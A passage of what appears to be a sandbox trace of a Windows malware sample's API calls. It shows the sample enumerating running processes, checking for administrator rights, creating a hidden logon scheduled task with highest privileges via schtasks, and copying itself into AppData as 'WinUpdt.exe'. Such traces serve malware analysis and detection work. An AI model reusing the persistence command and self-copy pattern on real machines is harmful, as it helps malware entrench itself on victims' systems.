SizeOfImage=0x17000, EntryPoint=0xab14a1)) returned 1 [0064.517] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.517] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xab0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="optimum.exe") returned 0xb [0064.517] CoTaskMemFree (pv=0x7943e0) [0064.517] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.517] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xab0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\MSBuild\\optimum.exe" (normalized: "c:\\program files (x86)\\msbuild\\optimum.exe")) returned 0x2a [0064.518] CoTaskMemFree (pv=0x7943e0) [0064.518] CloseHandle (hObject=0x1e4) returned 1 [0064.518] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.518] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x1e4 [0064.518] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23903a0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23903a0, lpcbNeeded=0x39e760) returned 0 [0064.518] GetCurrentProcessId () returned 0x8e8 [0064.518] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.518] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.518] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.519] CloseHandle (hObject=0x1e0) returned 1 [0064.519] CloseHandle (hObject=0x1e4) returned 1 [0064.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x57c) returned 0x1e4 [0064.519] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2390630, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2390630, lpcbNeeded=0x39e760) returned 1 [0064.520] GetModuleInformation (in: hProcess=0x1e4, hModule=0x2d0000, lpmodinfo=0x2390770, cb=0xc | out: lpmodinfo=0x2390770*(lpBaseOfDll=0x2d0000, SizeOfImage=0x17000, EntryPoint=0x2d14a1)) returned 1 [0064.520] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.521] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x2d0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="connectors-smith-we.exe") returned 0x17 [0064.521] CoTaskMemFree (pv=0x7943e0) [0064.521] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.521] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x2d0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\connectors-smith-we.exe" (normalized: "c:\\program files (x86)\\windows mail\\connectors-smith-we.exe")) returned 0x3b [0064.521] CoTaskMemFree (pv=0x7943e0) [0064.522] CloseHandle (hObject=0x1e4) returned 1 [0064.522] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.522] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x1e4 [0064.522] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2392a84, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2392a84, lpcbNeeded=0x39e760) returned 1 [0064.523] GetModuleInformation (in: hProcess=0x1e4, hModule=0x8f0000, lpmodinfo=0x2392bc4, cb=0xc | out: lpmodinfo=0x2392bc4*(lpBaseOfDll=0x8f0000, SizeOfImage=0x17000, EntryPoint=0x8f14a1)) returned 1 [0064.523] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.523] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x8f0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="alftp.exe") returned 0x9 [0064.523] CoTaskMemFree (pv=0x7943e0) [0064.523] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.523] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x8f0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\alftp.exe" (normalized: "c:\\program files\\internet explorer\\alftp.exe")) returned 0x2c [0064.524] CoTaskMemFree (pv=0x7943e0) [0064.524] CloseHandle (hObject=0x1e4) returned 1 [0064.524] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.524] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x88c) returned 0x1e4 [0064.524] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x2394ea0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x2394ea0, lpcbNeeded=0x39e760) returned 1 [0064.525] GetModuleInformation (in: hProcess=0x1e4, hModule=0x130000, lpmodinfo=0x2394fe0, cb=0xc | out: lpmodinfo=0x2394fe0*(lpBaseOfDll=0x130000, SizeOfImage=0x17000, EntryPoint=0x1314a1)) returned 1 [0064.525] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.525] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x130000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="totalcmd.exe") returned 0xc [0064.525] CoTaskMemFree (pv=0x7943e0) [0064.525] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.525] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x130000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft.NET\\totalcmd.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\totalcmd.exe")) returned 0x31 [0064.526] CoTaskMemFree (pv=0x7943e0) [0064.526] CloseHandle (hObject=0x1e4) returned 1 [0064.526] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.526] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x1e4 [0064.526] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23972cc, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23972cc, lpcbNeeded=0x39e760) returned 1 [0064.527] GetModuleInformation (in: hProcess=0x1e4, hModule=0xfb0000, lpmodinfo=0x239740c, cb=0xc | out: lpmodinfo=0x239740c*(lpBaseOfDll=0xfb0000, SizeOfImage=0x17000, EntryPoint=0xfb14a1)) returned 1 [0064.527] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.527] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xfb0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="attractive.exe") returned 0xe [0064.527] CoTaskMemFree (pv=0x7943e0) [0064.527] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.527] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xfb0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Microsoft Sync Framework\\attractive.exe" (normalized: "c:\\program files\\microsoft sync framework\\attractive.exe")) returned 0x38 [0064.528] CoTaskMemFree (pv=0x7943e0) [0064.528] CloseHandle (hObject=0x1e4) returned 1 [0064.528] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.528] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x1e4 [0064.528] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x239970c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x239970c, lpcbNeeded=0x39e760) returned 1 [0064.529] GetModuleInformation (in: hProcess=0x1e4, hModule=0x10000, lpmodinfo=0x239984c, cb=0xc | out: lpmodinfo=0x239984c*(lpBaseOfDll=0x10000, SizeOfImage=0x17000, EntryPoint=0x114a1)) returned 1 [0064.529] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.529] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x10000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="creditservice.exe") returned 0x11 [0064.529] CoTaskMemFree (pv=0x7943e0) [0064.529] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.529] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x10000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\creditservice.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\creditservice.exe")) returned 0x41 [0064.530] CoTaskMemFree (pv=0x7943e0) [0064.530] CloseHandle (hObject=0x1e4) returned 1 [0064.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.530] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa10) returned 0x1e4 [0064.530] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x239bb60, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x239bb60, lpcbNeeded=0x39e760) returned 0 [0064.530] GetCurrentProcessId () returned 0x8e8 [0064.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.530] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.530] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.531] CloseHandle (hObject=0x1e0) returned 1 [0064.531] CloseHandle (hObject=0x1e4) returned 1 [0064.531] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c0) returned 0x1e4 [0064.531] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x239bdf0, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x239bdf0, lpcbNeeded=0x39e760) returned 1 [0064.532] GetModuleInformation (in: hProcess=0x1e4, hModule=0xb20000, lpmodinfo=0x239bf30, cb=0xc | out: lpmodinfo=0x239bf30*(lpBaseOfDll=0xb20000, SizeOfImage=0x17000, EntryPoint=0xb214a1)) returned 1 [0064.533] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.533] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xb20000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="mechanical wake sur.exe") returned 0x17 [0064.533] CoTaskMemFree (pv=0x7943e0) [0064.533] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.533] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xb20000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Adobe\\mechanical wake sur.exe" (normalized: "c:\\program files (x86)\\adobe\\mechanical wake sur.exe")) returned 0x34 [0064.533] CoTaskMemFree (pv=0x7943e0) [0064.533] CloseHandle (hObject=0x1e4) returned 1 [0064.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.533] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x31c) returned 0x1e4 [0064.533] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x239e238, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x239e238, lpcbNeeded=0x39e760) returned 1 [0064.535] GetModuleInformation (in: hProcess=0x1e4, hModule=0xdf0000, lpmodinfo=0x239e378, cb=0xc | out: lpmodinfo=0x239e378*(lpBaseOfDll=0xdf0000, SizeOfImage=0x17000, EntryPoint=0xdf14a1)) returned 1 [0064.535] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.535] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0xdf0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="coreftp.exe") returned 0xb [0064.535] CoTaskMemFree (pv=0x7943e0) [0064.535] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.535] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0xdf0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\coreftp.exe" (normalized: "c:\\program files\\windows media player\\coreftp.exe")) returned 0x31 [0064.535] CoTaskMemFree (pv=0x7943e0) [0064.535] CloseHandle (hObject=0x1e4) returned 1 [0064.535] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.536] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x87c) returned 0x1e4 [0064.536] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23a0660, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23a0660, lpcbNeeded=0x39e760) returned 1 [0064.537] GetModuleInformation (in: hProcess=0x1e4, hModule=0x1200000, lpmodinfo=0x23a07a0, cb=0xc | out: lpmodinfo=0x23a07a0*(lpBaseOfDll=0x1200000, SizeOfImage=0x17000, EntryPoint=0x12014a1)) returned 1 [0064.537] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.537] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x1200000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="thunderbird.exe") returned 0xf [0064.537] CoTaskMemFree (pv=0x7943e0) [0064.537] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.537] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x1200000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\thunderbird.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\thunderbird.exe")) returned 0x3b [0064.538] CoTaskMemFree (pv=0x7943e0) [0064.538] CloseHandle (hObject=0x1e4) returned 1 [0064.538] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.539] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e4 [0064.539] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23a2c9c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23a2c9c, lpcbNeeded=0x39e760) returned 0 [0064.539] GetCurrentProcessId () returned 0x8e8 [0064.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.539] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.539] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.540] CloseHandle (hObject=0x1e0) returned 1 [0064.540] CloseHandle (hObject=0x1e4) returned 1 [0064.540] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x1e4 [0064.540] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23a2f2c, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23a2f2c, lpcbNeeded=0x39e760) returned 1 [0064.541] GetModuleInformation (in: hProcess=0x1e4, hModule=0x9f0000, lpmodinfo=0x23a306c, cb=0xc | out: lpmodinfo=0x23a306c*(lpBaseOfDll=0x9f0000, SizeOfImage=0x17000, EntryPoint=0x9f14a1)) returned 1 [0064.541] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.541] GetModuleBaseNameW (in: hProcess=0x1e4, hModule=0x9f0000, lpBaseName=0x7943e0, nSize=0x800 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0064.542] CoTaskMemFree (pv=0x7943e0) [0064.542] CoTaskMemAlloc (cb=0x804) returned 0x7943e0 [0064.542] GetModuleFileNameExW (in: hProcess=0x1e4, hModule=0x9f0000, lpFilename=0x7943e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\gmailnotifierpro.exe" (normalized: "c:\\program files\\windows defender\\gmailnotifierpro.exe")) returned 0x36 [0064.542] CoTaskMemFree (pv=0x7943e0) [0064.542] CloseHandle (hObject=0x1e4) returned 1 [0064.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.542] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x1e4 [0064.542] EnumProcessModules (in: hProcess=0x1e4, lphModule=0x23a5374, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23a5374, lpcbNeeded=0x39e760) returned 0 [0064.542] GetCurrentProcessId () returned 0x8e8 [0064.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8e8) returned 0x1e0 [0064.542] IsWow64Process (in: hProcess=0x1e0, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.543] IsWow64Process (in: hProcess=0x1e4, Wow64Process=0x39e6e0 | out: Wow64Process=0x39e6e0) returned 1 [0064.543] CloseHandle (hObject=0x1e0) returned 1 [0064.544] CloseHandle (hObject=0x1e4) returned 1 [0064.545] GetCurrentProcess () returned 0xffffffff [0064.545] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x39e730 | out: TokenHandle=0x39e730*=0x1e4) returned 1 [0064.545] GetTokenInformation (in: TokenHandle=0x1e4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x39e730 | out: TokenInformation=0x0, ReturnLength=0x39e730) returned 0 [0064.545] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7f6e30 [0064.545] GetTokenInformation (in: TokenHandle=0x1e4, TokenInformationClass=0x8, TokenInformation=0x7f6e30, TokenInformationLength=0x4, ReturnLength=0x39e730 | out: TokenInformation=0x7f6e30, ReturnLength=0x39e730) returned 1 [0064.545] LocalFree (hMem=0x7f6e30) returned 0x0 [0064.546] DuplicateTokenEx (in: hExistingToken=0x1e4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x39e738 | out: phNewToken=0x39e738*=0x1e0) returned 1 [0064.546] CheckTokenMembership (in: TokenHandle=0x1e0, SidToCheck=0x23a58bc*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x39e748 | out: IsMember=0x39e748) returned 1 [0064.546] CloseHandle (hObject=0x1e0) returned 1 [0064.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.546] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0064.549] LocalAlloc (uFlags=0x0, uBytes=0xea) returned 0x7e3eb0 [0064.550] ShellExecuteExW (in: pExecInfo=0x23a5ee8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/create /f /sc ONLOGON /RL HIGHEST /tn \"'WinUpdt\"' /tr \"'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe\"'", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x23a5ee8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/create /f /sc ONLOGON /RL HIGHEST /tn \"'WinUpdt\"' /tr \"'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe\"'", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x458)) returned 1 [0066.983] LocalFree (hMem=0x7ebdf8) returned 0x0 [0066.983] LocalFree (hMem=0x7e3eb0) returned 0x0 [0066.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0066.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e29c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0066.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x39e6fc) returned 1 [0066.984] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe"), fInfoLevelId=0x0, lpFileInformation=0x39e778 | out: lpFileInformation=0x39e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0066.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x39e6f8) returned 1 [0066.984] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0066.985] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe", lpFilePart=0x0) returned 0x39 [0066.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x39e6a0) returned 1 [0066.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x418 [0066.987] GetFileType (hFile=0x418) returned 0x1 [0066.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x39e69c) returned 1 [0066.987] GetFileType (hFile=0x418) returned 0x1 [0066.987] GetCurrentProcessId () returned 0x8e8 [0066.987] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e8) returned 0x414 [0066.987] EnumProcessModules (in: hProcess=0x414, lphModule=0x23a6538, cb=0x100, lpcbNeeded=0x39e760 | out: lphModule=0x23a6538, lpcbNeeded=0x39e760) returned 1 [0066.988] EnumProcessModules (in: hProcess=0x414, lphModule=0x23a6644, cb=0x200, lpcbNeeded=0x39e760 | out: lphModule=0x23a6644, lpcbNeeded=0x39e760) returned 1 [0066.990] GetModuleInformation (in: hProcess=0x414, hModule=0xe90000, lpmodinfo=0x23a6884, cb=0xc | out: lpmodinfo=0x23a6884*(lpBaseOfDll=0xe90000, SizeOfImage=0x1a000, EntryPoint=0xea40fe)) returned 1 [0066.990] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0066.990] GetModuleBaseNameW (in: hProcess=0x414, hModule=0xe90000, lpBaseName=0x7fa320, nSize=0x800 | out: lpBaseName="WinUpdt.exe") returned 0xb [0066.990] CoTaskMemFree (pv=0x7fa320) [0066.990] CoTaskMemAlloc (cb=0x804) returned 0x7fa320 [0066.990] GetModuleFileNameExW (in: hProcess=0x414, hModule=0xe90000, lpFilename=0x7fa320, nSize=0x800 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe")) returned 0x31 [0066.990] CoTaskMemFree (pv=0x7fa320) [0066.990] CloseHandle (hObject=0x414) returned 1 [0066.990] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe", nBufferLength=0x105, lpBuffer=0x39e188, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe", lpFilePart=0x0) returned 0x31 [0066.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x39e67c) returned 1 [0066.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WinUpdt.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\winupdt.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x414 [0066.991] GetFileType (hFile=0x414) returned 0x1 [0066.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x39e678) returned 1 [0066.991] GetFileType (hFile=0x414) returned 0x1 [0066.991] GetFileSize (in: hFile=0x414, lpFileSizeHigh=0x39e784 | out: lpFileSizeHigh=0x39e784*=0x0) returned 0x298bd59 [0067.290] ReadFile (in: hFile=0x414, lpBuffer=0x9151018, nNumberOfBytesToRead=0x298bd59, lpNumberOfBytesRead=0x39e730, lpOverlapped=0x0 | out: lpBuffer=0x9151018*, lpNumberOfBytesRead=0x39e730*=0x298bd59, lpOverlapped=0x0) returned 1 [0068.921] CloseHandle (hObject=0x414) returned 1 [0068.922] WriteFile (in: hFile=0x418, lpBuffer=0x9151018*, nNumberOfBytesToWrite=0x298bd59, lpNumberOfBytesWritten=0x39e768, lpOverlapped=0x0 | out: lpBuffer=0x9151018*, 